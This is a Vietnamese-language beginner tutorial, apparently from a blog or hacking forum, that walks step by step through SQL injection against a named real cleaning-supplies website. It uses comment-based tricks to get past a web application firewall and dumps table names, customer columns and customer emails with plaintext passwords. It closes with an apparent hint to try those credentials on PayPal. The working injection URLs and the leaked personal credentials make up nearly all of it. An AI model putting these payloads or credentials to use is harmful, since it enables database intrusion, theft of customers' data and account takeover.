Hôm này khai mạc Euro 2012 nên mình mạo muội làm cái tut sql dạng 406 cho Newbie mong các bạn biết rồi đừng ném gạch nhuể.

Site:


Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
-->Ko lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
-->lỗi.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Tiến hành By pass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+Tiếp tục by pass:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,o rders,products,specialfiles
+ Get colums: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,l astname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getem ail,billme,shipping,orders

+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .

Đăng nhận xét